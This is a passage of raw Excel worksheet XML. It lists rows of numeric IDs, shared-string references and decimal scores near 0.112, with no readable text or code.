      <c r="E24526" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24526" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24527" ht="15.75" customHeight="1">
      <c r="A24527" s="1">
        <v>22619.0</v>
      </c>
      <c r="B24527" s="2">
        <v>4.0041559E7</v>
      </c>
      <c r="C24527" s="2" t="s">
        <v>23611</v>
      </c>
      <c r="D24527" s="2">
        <v>1.0</v>
      </c>
      <c r="E24527" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24527" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24528" ht="15.75" customHeight="1">
      <c r="A24528" s="1">
        <v>23113.0</v>
      </c>
      <c r="B24528" s="2">
        <v>5.1175617E7</v>
      </c>
      <c r="C24528" s="2" t="s">
        <v>23612</v>
      </c>
      <c r="D24528" s="2">
        <v>1.0</v>
      </c>
      <c r="E24528" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24528" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24529" ht="15.75" customHeight="1">
      <c r="A24529" s="1">
        <v>23117.0</v>
      </c>
      <c r="B24529" s="2">
        <v>5124516.0</v>
      </c>
      <c r="C24529" s="2" t="s">
        <v>23613</v>
      </c>
      <c r="D24529" s="2">
        <v>1.0</v>
      </c>
      <c r="E24529" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24529" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24530" ht="15.75" customHeight="1">
      <c r="A24530" s="1">
        <v>23296.0</v>
      </c>
      <c r="B24530" s="2">
        <v>5.394056E7</v>
      </c>
      <c r="C24530" s="2" t="s">
        <v>23614</v>
      </c>
      <c r="D24530" s="2">
        <v>1.0</v>
      </c>
      <c r="E24530" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24530" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24531" ht="15.75" customHeight="1">
      <c r="A24531" s="1">
        <v>23497.0</v>
      </c>
      <c r="B24531" s="2">
        <v>5760471.0</v>
      </c>
      <c r="C24531" s="2" t="s">
        <v>23615</v>
      </c>
      <c r="D24531" s="2">
        <v>1.0</v>
      </c>
      <c r="E24531" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24531" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24532" ht="15.75" customHeight="1">
      <c r="A24532" s="1">
        <v>23726.0</v>
      </c>
      <c r="B24532" s="2">
        <v>7234105.0</v>
      </c>
      <c r="C24532" s="2" t="s">
        <v>23616</v>
      </c>
      <c r="D24532" s="2">
        <v>1.0</v>
      </c>
      <c r="E24532" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24532" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24533" ht="15.75" customHeight="1">
      <c r="A24533" s="1">
        <v>23886.0</v>
      </c>
      <c r="B24533" s="2">
        <v>8402614.0</v>
      </c>
      <c r="C24533" s="2" t="s">
        <v>23617</v>
      </c>
      <c r="D24533" s="2">
        <v>1.0</v>
      </c>
      <c r="E24533" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24533" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24534" ht="15.75" customHeight="1">
      <c r="A24534" s="1">
        <v>23955.0</v>
      </c>
      <c r="B24534" s="2">
        <v>8927444.0</v>
      </c>
      <c r="C24534" s="2" t="s">
        <v>23618</v>
      </c>
      <c r="D24534" s="2">
        <v>1.0</v>
      </c>
      <c r="E24534" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24534" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24535" ht="15.75" customHeight="1">
      <c r="A24535" s="1">
        <v>24082.0</v>
      </c>
      <c r="B24535" s="2">
        <v>9721652.0</v>
      </c>
      <c r="C24535" s="2" t="s">
        <v>23619</v>
      </c>
      <c r="D24535" s="2">
        <v>1.0</v>
      </c>
      <c r="E24535" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24535" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24536" ht="15.75" customHeight="1">
      <c r="A24536" s="1">
        <v>24583.0</v>
      </c>
      <c r="B24536" s="2">
        <v>1.1329567E7</v>
      </c>
      <c r="C24536" s="2" t="s">
        <v>23620</v>
      </c>
      <c r="D24536" s="2">
        <v>1.0</v>
      </c>
      <c r="E24536" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24536" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24537" ht="15.75" customHeight="1">
      <c r="A24537" s="1">
        <v>24592.0</v>
      </c>
      <c r="B24537" s="2">
        <v>1.1383924E7</v>
      </c>
      <c r="C24537" s="2" t="s">
        <v>23621</v>
      </c>
      <c r="D24537" s="2">
        <v>1.0</v>
      </c>
      <c r="E24537" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24537" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24538" ht="15.75" customHeight="1">
      <c r="A24538" s="1">
        <v>24935.0</v>
      </c>
      <c r="B24538" s="2">
        <v>1.2471336E7</v>
      </c>
      <c r="C24538" s="2" t="s">
        <v>23622</v>
      </c>
      <c r="D24538" s="2">
        <v>1.0</v>
      </c>
      <c r="E24538" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24538" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24539" ht="15.75" customHeight="1">
      <c r="A24539" s="1">
        <v>25728.0</v>
      </c>
      <c r="B24539" s="2">
        <v>1.4550211E7</v>
      </c>
      <c r="C24539" s="2" t="s">
        <v>23623</v>
      </c>
      <c r="D24539" s="2">
        <v>1.0</v>
      </c>
      <c r="E24539" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24539" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24540" ht="15.75" customHeight="1">
      <c r="A24540" s="1">
        <v>25838.0</v>
      </c>
      <c r="B24540" s="2">
        <v>1.4792727E7</v>
      </c>
      <c r="C24540" s="2" t="s">
        <v>23624</v>
      </c>
      <c r="D24540" s="2">
        <v>1.0</v>
      </c>
      <c r="E24540" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24540" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24541" ht="15.75" customHeight="1">
      <c r="A24541" s="1">
        <v>26081.0</v>
      </c>
      <c r="B24541" s="2">
        <v>1.5641933E7</v>
      </c>
      <c r="C24541" s="2" t="s">
        <v>23625</v>
      </c>
      <c r="D24541" s="2">
        <v>1.0</v>
      </c>
      <c r="E24541" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24541" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24542" ht="15.75" customHeight="1">
      <c r="A24542" s="1">
        <v>26294.0</v>
      </c>
      <c r="B24542" s="2">
        <v>1.6515666E7</v>
      </c>
      <c r="C24542" s="2" t="s">
        <v>23626</v>
      </c>
      <c r="D24542" s="2">
        <v>1.0</v>
      </c>
      <c r="E24542" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24542" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24543" ht="15.75" customHeight="1">
      <c r="A24543" s="1">
        <v>26600.0</v>
      </c>
      <c r="B24543" s="2">
        <v>1.798606E7</v>
      </c>
      <c r="C24543" s="2" t="s">
        <v>23627</v>
      </c>
      <c r="D24543" s="2">
        <v>1.0</v>
      </c>
      <c r="E24543" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24543" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24544" ht="15.75" customHeight="1">
      <c r="A24544" s="1">
        <v>26895.0</v>
      </c>
      <c r="B24544" s="2">
        <v>1.9260605E7</v>
      </c>
      <c r="C24544" s="2" t="s">
        <v>23605</v>
      </c>
      <c r="D24544" s="2">
        <v>1.0</v>
      </c>
      <c r="E24544" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24544" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24545" ht="15.75" customHeight="1">
      <c r="A24545" s="1">
        <v>26934.0</v>
      </c>
      <c r="B24545" s="2">
        <v>1.9522879E7</v>
      </c>
      <c r="C24545" s="2" t="s">
        <v>23628</v>
      </c>
      <c r="D24545" s="2">
        <v>1.0</v>
      </c>
      <c r="E24545" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24545" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24546" ht="15.75" customHeight="1">
      <c r="A24546" s="1">
        <v>27319.0</v>
      </c>
      <c r="B24546" s="2">
        <v>2.1378203E7</v>
      </c>
      <c r="C24546" s="2" t="s">
        <v>23606</v>
      </c>
      <c r="D24546" s="2">
        <v>1.0</v>
      </c>
      <c r="E24546" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24546" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24547" ht="15.75" customHeight="1">
      <c r="A24547" s="1">
        <v>27849.0</v>
      </c>
      <c r="B24547" s="2">
        <v>2.3425306E7</v>
      </c>
      <c r="C24547" s="2" t="s">
        <v>23629</v>
      </c>
      <c r="D24547" s="2">
        <v>1.0</v>
      </c>
      <c r="E24547" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24547" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24548" ht="15.75" customHeight="1">
      <c r="A24548" s="1">
        <v>28039.0</v>
      </c>
      <c r="B24548" s="2">
        <v>2.4491998E7</v>
      </c>
      <c r="C24548" s="2" t="s">
        <v>23630</v>
      </c>
      <c r="D24548" s="2">
        <v>1.0</v>
      </c>
      <c r="E24548" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24548" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24549" ht="15.75" customHeight="1">
      <c r="A24549" s="1">
        <v>28787.0</v>
      </c>
      <c r="B24549" s="2">
        <v>2.8528827E7</v>
      </c>
      <c r="C24549" s="2" t="s">
        <v>23631</v>
      </c>
      <c r="D24549" s="2">
        <v>1.0</v>
      </c>
      <c r="E24549" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24549" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24550" ht="15.75" customHeight="1">
      <c r="A24550" s="1">
        <v>29054.0</v>
      </c>
      <c r="B24550" s="2">
        <v>3.0236865E7</v>
      </c>
      <c r="C24550" s="2" t="s">
        <v>23632</v>
      </c>
      <c r="D24550" s="2">
        <v>1.0</v>
      </c>
      <c r="E24550" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24550" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24551" ht="15.75" customHeight="1">
      <c r="A24551" s="1">
        <v>29108.0</v>
      </c>
      <c r="B24551" s="2">
        <v>3.043397E7</v>
      </c>
      <c r="C24551" s="2" t="s">
        <v>23633</v>
      </c>
      <c r="D24551" s="2">
        <v>1.0</v>
      </c>
      <c r="E24551" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24551" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24552" ht="15.75" customHeight="1">
      <c r="A24552" s="1">
        <v>29906.0</v>
      </c>
      <c r="B24552" s="2">
        <v>3607050.0</v>
      </c>
      <c r="C24552" s="2" t="s">
        <v>23634</v>
      </c>
      <c r="D24552" s="2">
        <v>1.0</v>
      </c>
      <c r="E24552" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24552" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24553" ht="15.75" customHeight="1">
      <c r="A24553" s="1">
        <v>30742.0</v>
      </c>
      <c r="B24553" s="2">
        <v>4.4029816E7</v>
      </c>
      <c r="C24553" s="2" t="s">
        <v>23635</v>
      </c>
      <c r="D24553" s="2">
        <v>1.0</v>
      </c>
      <c r="E24553" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24553" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24554" ht="15.75" customHeight="1">
      <c r="A24554" s="1">
        <v>31795.0</v>
      </c>
      <c r="B24554" s="2">
        <v>5237006.0</v>
      </c>
      <c r="C24554" s="2" t="s">
        <v>23636</v>
      </c>
      <c r="D24554" s="2">
        <v>1.0</v>
      </c>
      <c r="E24554" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24554" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24555" ht="15.75" customHeight="1">
      <c r="A24555" s="1">
        <v>31890.0</v>
      </c>
      <c r="B24555" s="2">
        <v>5.2881917E7</v>
      </c>
      <c r="C24555" s="2" t="s">
        <v>23637</v>
      </c>
      <c r="D24555" s="2">
        <v>1.0</v>
      </c>
      <c r="E24555" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24555" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24556" ht="15.75" customHeight="1">
      <c r="A24556" s="1">
        <v>31982.0</v>
      </c>
      <c r="B24556" s="2">
        <v>5322255.0</v>
      </c>
      <c r="C24556" s="2" t="s">
        <v>23638</v>
      </c>
      <c r="D24556" s="2">
        <v>1.0</v>
      </c>
      <c r="E24556" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24556" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24557" ht="15.75" customHeight="1">
      <c r="A24557" s="1">
        <v>32325.0</v>
      </c>
      <c r="B24557" s="2">
        <v>5.5767663E7</v>
      </c>
      <c r="C24557" s="2" t="s">
        <v>23639</v>
      </c>
      <c r="D24557" s="2">
        <v>1.0</v>
      </c>
      <c r="E24557" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24557" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24558" ht="15.75" customHeight="1">
      <c r="A24558" s="1">
        <v>32424.0</v>
      </c>
      <c r="B24558" s="2">
        <v>5644987.0</v>
      </c>
      <c r="C24558" s="2" t="s">
        <v>23640</v>
      </c>
      <c r="D24558" s="2">
        <v>1.0</v>
      </c>
      <c r="E24558" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24558" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24559" ht="15.75" customHeight="1">
      <c r="A24559" s="1">
        <v>32436.0</v>
      </c>
      <c r="B24559" s="2">
        <v>5.6574715E7</v>
      </c>
      <c r="C24559" s="2" t="s">
        <v>23641</v>
      </c>
      <c r="D24559" s="2">
        <v>1.0</v>
      </c>
      <c r="E24559" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24559" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24560" ht="15.75" customHeight="1">
      <c r="A24560" s="1">
        <v>32566.0</v>
      </c>
      <c r="B24560" s="2">
        <v>5769097.0</v>
      </c>
      <c r="C24560" s="2" t="s">
        <v>23642</v>
      </c>
      <c r="D24560" s="2">
        <v>1.0</v>
      </c>
      <c r="E24560" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24560" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24561" ht="15.75" customHeight="1">
      <c r="A24561" s="1">
        <v>32734.0</v>
      </c>
      <c r="B24561" s="2">
        <v>6014998.0</v>
      </c>
      <c r="C24561" s="2" t="s">
        <v>23643</v>
      </c>
      <c r="D24561" s="2">
        <v>1.0</v>
      </c>
      <c r="E24561" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24561" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24562" ht="15.75" customHeight="1">
      <c r="A24562" s="1">
        <v>33184.0</v>
      </c>
      <c r="B24562" s="2">
        <v>7109005.0</v>
      </c>
      <c r="C24562" s="2" t="s">
        <v>23644</v>
      </c>
      <c r="D24562" s="2">
        <v>1.0</v>
      </c>
      <c r="E24562" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24562" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24563" ht="15.75" customHeight="1">
      <c r="A24563" s="1">
        <v>33413.0</v>
      </c>
      <c r="B24563" s="2">
        <v>7736974.0</v>
      </c>
      <c r="C24563" s="2" t="s">
        <v>23645</v>
      </c>
      <c r="D24563" s="2">
        <v>1.0</v>
      </c>
      <c r="E24563" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24563" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24564" ht="15.75" customHeight="1">
      <c r="A24564" s="1">
        <v>33417.0</v>
      </c>
      <c r="B24564" s="2">
        <v>7745422.0</v>
      </c>
      <c r="C24564" s="2" t="s">
        <v>23646</v>
      </c>
      <c r="D24564" s="2">
        <v>1.0</v>
      </c>
      <c r="E24564" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24564" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24565" ht="15.75" customHeight="1">
      <c r="A24565" s="1">
        <v>33658.0</v>
      </c>
      <c r="B24565" s="2">
        <v>8402613.0</v>
      </c>
      <c r="C24565" s="2" t="s">
        <v>23617</v>
      </c>
      <c r="D24565" s="2">
        <v>1.0</v>
      </c>
      <c r="E24565" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24565" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24566" ht="15.75" customHeight="1">
      <c r="A24566" s="1">
        <v>33660.0</v>
      </c>
      <c r="B24566" s="2">
        <v>8404725.0</v>
      </c>
      <c r="C24566" s="2" t="s">
        <v>23647</v>
      </c>
      <c r="D24566" s="2">
        <v>1.0</v>
      </c>
      <c r="E24566" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24566" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24567" ht="15.75" customHeight="1">
      <c r="A24567" s="1">
        <v>33727.0</v>
      </c>
      <c r="B24567" s="2">
        <v>8526329.0</v>
      </c>
      <c r="C24567" s="2" t="s">
        <v>23648</v>
      </c>
      <c r="D24567" s="2">
        <v>1.0</v>
      </c>
      <c r="E24567" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24567" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24568" ht="15.75" customHeight="1">
      <c r="A24568" s="1">
        <v>34249.0</v>
      </c>
      <c r="B24568" s="2">
        <v>4.9245431E7</v>
      </c>
      <c r="C24568" s="2" t="s">
        <v>23649</v>
      </c>
      <c r="D24568" s="2">
        <v>1.0</v>
      </c>
      <c r="E24568" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24568" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24569" ht="15.75" customHeight="1">
      <c r="A24569" s="1">
        <v>23208.0</v>
      </c>
      <c r="B24569" s="2">
        <v>5.2599617E7</v>
      </c>
      <c r="C24569" s="2" t="s">
        <v>23650</v>
      </c>
      <c r="D24569" s="2">
        <v>1.0</v>
      </c>
      <c r="E24569" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24569" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="24570" ht="15.75" customHeight="1">
      <c r="A24570" s="1">
        <v>25897.0</v>
      </c>
      <c r="B24570" s="2">
        <v>1.5026448E7</v>
      </c>
      <c r="C24570" s="2" t="s">
        <v>23651</v>
      </c>
      <c r="D24570" s="2">
        <v>1.0</v>
      </c>
      <c r="E24570" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24570" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="24571" ht="15.75" customHeight="1">
      <c r="A24571" s="1">
        <v>27272.0</v>
      </c>
      <c r="B24571" s="2">
        <v>2.1229056E7</v>
      </c>
      <c r="C24571" s="2" t="s">
        <v>23652</v>
      </c>
      <c r="D24571" s="2">
        <v>1.0</v>
      </c>
      <c r="E24571" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24571" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="24572" ht="15.75" customHeight="1">
      <c r="A24572" s="1">
        <v>27578.0</v>
      </c>
      <c r="B24572" s="2">
        <v>2.250173E7</v>
      </c>
      <c r="C24572" s="2" t="s">
        <v>23653</v>
      </c>
      <c r="D24572" s="2">
        <v>1.0</v>
      </c>
      <c r="E24572" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24572" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="24573" ht="15.75" customHeight="1">
      <c r="A24573" s="1">
        <v>33587.0</v>
      </c>
      <c r="B24573" s="2">
        <v>8325486.0</v>
      </c>
      <c r="C24573" s="2" t="s">
        <v>23654</v>
      </c>
      <c r="D24573" s="2">
        <v>1.0</v>
      </c>
      <c r="E24573" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24573" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="24574" ht="15.75" customHeight="1">
      <c r="A24574" s="1">
        <v>8043.0</v>
      </c>
      <c r="B24574" s="2">
        <v>5.2845408E7</v>
      </c>
      <c r="C24574" s="2" t="s">
        <v>23655</v>
      </c>
      <c r="D24574" s="2">
        <v>1.0</v>
      </c>
      <c r="E24574" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24574" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="24575" ht="15.75" customHeight="1">
      <c r="A24575" s="1">
        <v>10487.0</v>
      </c>
      <c r="B24575" s="2">
        <v>1.1007392E7</v>
      </c>
      <c r="C24575" s="2" t="s">
        <v>23656</v>
      </c>
      <c r="D24575" s="2">
        <v>1.0</v>
      </c>
      <c r="E24575" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24575" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="24576" ht="15.75" customHeight="1">
      <c r="A24576" s="1">
        <v>12987.0</v>
      </c>
      <c r="B24576" s="2">
        <v>3.2726838E7</v>
      </c>
      <c r="C24576" s="2" t="s">
        <v>23657</v>
      </c>
      <c r="D24576" s="2">
        <v>1.0</v>
      </c>
      <c r="E24576" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24576" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="24577" ht="15.75" customHeight="1">
      <c r="A24577" s="1">
        <v>21304.0</v>
      </c>
      <c r="B24577" s="2">
        <v>2.0743537E7</v>
      </c>
      <c r="C24577" s="2" t="s">
        <v>23388</v>
      </c>
      <c r="D24577" s="2">
        <v>1.0</v>
      </c>
      <c r="E24577" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24577" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="24578" ht="15.75" customHeight="1">
      <c r="A24578" s="1">
        <v>22465.0</v>
      </c>
      <c r="B24578" s="2">
        <v>3.6581385E7</v>
      </c>
      <c r="C24578" s="2" t="s">
        <v>23658</v>
      </c>
      <c r="D24578" s="2">
        <v>1.0</v>
      </c>
      <c r="E24578" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24578" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="24579" ht="15.75" customHeight="1">
      <c r="A24579" s="1">
        <v>27444.0</v>
      </c>
      <c r="B24579" s="2">
        <v>2.1981757E7</v>
      </c>
      <c r="C24579" s="2" t="s">
        <v>23659</v>
      </c>
      <c r="D24579" s="2">
        <v>1.0</v>
      </c>
      <c r="E24579" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24579" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="24580" ht="15.75" customHeight="1">
      <c r="A24580" s="1">
        <v>32063.0</v>
      </c>
      <c r="B24580" s="2">
        <v>5379390.0</v>
      </c>
      <c r="C24580" s="2" t="s">
        <v>23660</v>
      </c>
      <c r="D24580" s="2">
        <v>1.0</v>
      </c>
      <c r="E24580" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24580" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="24581" ht="15.75" customHeight="1">
      <c r="A24581" s="1">
        <v>17278.0</v>
      </c>
      <c r="B24581" s="2">
        <v>4.9204633E7</v>
      </c>
      <c r="C24581" s="2" t="s">
        <v>23661</v>
      </c>
      <c r="D24581" s="2">
        <v>1.0</v>
      </c>
      <c r="E24581" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24581" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="24582" ht="15.75" customHeight="1">
      <c r="A24582" s="1">
        <v>33230.0</v>
      </c>
      <c r="B24582" s="2">
        <v>7276227.0</v>
      </c>
      <c r="C24582" s="2" t="s">
        <v>23662</v>
      </c>
      <c r="D24582" s="2">
        <v>1.0</v>
      </c>
      <c r="E24582" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24582" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="24583" ht="15.75" customHeight="1">
      <c r="A24583" s="1">
        <v>22457.0</v>
      </c>
      <c r="B24583" s="2">
        <v>3.6307929E7</v>
      </c>
      <c r="C24583" s="2" t="s">
        <v>23663</v>
      </c>
      <c r="D24583" s="2">
        <v>1.0</v>
      </c>
      <c r="E24583" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24583" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="24584" ht="15.75" customHeight="1">
      <c r="A24584" s="1">
        <v>23140.0</v>
      </c>
      <c r="B24584" s="2">
        <v>5.1603128E7</v>
      </c>
      <c r="C24584" s="2" t="s">
        <v>23664</v>
      </c>
      <c r="D24584" s="2">
        <v>1.0</v>
      </c>
      <c r="E24584" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24584" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="24585" ht="15.75" customHeight="1">
      <c r="A24585" s="1">
        <v>25827.0</v>
      </c>
      <c r="B24585" s="2">
        <v>1.4769933E7</v>
      </c>
      <c r="C24585" s="2" t="s">
        <v>23665</v>
      </c>
      <c r="D24585" s="2">
        <v>1.0</v>
      </c>
      <c r="E24585" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24585" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="24586" ht="15.75" customHeight="1">
      <c r="A24586" s="1">
        <v>28137.0</v>
      </c>
      <c r="B24586" s="2">
        <v>2.4795066E7</v>
      </c>
      <c r="C24586" s="2" t="s">
        <v>23666</v>
      </c>
      <c r="D24586" s="2">
        <v>1.0</v>
      </c>
      <c r="E24586" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24586" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="24587" ht="15.75" customHeight="1">
      <c r="A24587" s="1">
        <v>33034.0</v>
      </c>
      <c r="B24587" s="2">
        <v>6715799.0</v>
      </c>
      <c r="C24587" s="2" t="s">
        <v>23667</v>
      </c>
      <c r="D24587" s="2">
        <v>1.0</v>
      </c>
      <c r="E24587" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24587" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="24588" ht="15.75" customHeight="1">
      <c r="A24588" s="1">
        <v>16661.0</v>
      </c>
      <c r="B24588" s="2">
        <v>4.7231494E7</v>
      </c>
      <c r="C24588" s="2" t="s">
        <v>23668</v>
      </c>
      <c r="D24588" s="2">
        <v>1.0</v>
      </c>
      <c r="E24588" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24588" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="24589" ht="15.75" customHeight="1">
      <c r="A24589" s="1">
        <v>22530.0</v>
      </c>
      <c r="B24589" s="2">
        <v>3.7779984E7</v>
      </c>
      <c r="C24589" s="2" t="s">
        <v>23669</v>
      </c>
      <c r="D24589" s="2">
        <v>1.0</v>
      </c>
      <c r="E24589" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24589" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="24590" ht="15.75" customHeight="1">
      <c r="A24590" s="1">
        <v>26020.0</v>
      </c>
      <c r="B24590" s="2">
        <v>1.537376E7</v>
      </c>
      <c r="C24590" s="2" t="s">
        <v>23670</v>
      </c>
      <c r="D24590" s="2">
        <v>1.0</v>
      </c>
      <c r="E24590" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24590" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="24591" ht="15.75" customHeight="1">
      <c r="A24591" s="1">
        <v>28891.0</v>
      </c>
      <c r="B24591" s="2">
        <v>2.9275661E7</v>
      </c>
      <c r="C24591" s="2" t="s">
        <v>23671</v>
      </c>
      <c r="D24591" s="2">
        <v>1.0</v>
      </c>
      <c r="E24591" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24591" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="24592" ht="15.75" customHeight="1">
      <c r="A24592" s="1">
        <v>32073.0</v>
      </c>
      <c r="B24592" s="2">
        <v>5.3804019E7</v>
      </c>
      <c r="C24592" s="2" t="s">
        <v>23672</v>
      </c>
      <c r="D24592" s="2">
        <v>1.0</v>
      </c>
      <c r="E24592" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24592" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="24593" ht="15.75" customHeight="1">
      <c r="A24593" s="1">
        <v>33638.0</v>
      </c>
      <c r="B24593" s="2">
        <v>8367750.0</v>
      </c>
      <c r="C24593" s="2" t="s">
        <v>23673</v>
      </c>
      <c r="D24593" s="2">
        <v>1.0</v>
      </c>
      <c r="E24593" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24593" s="2">
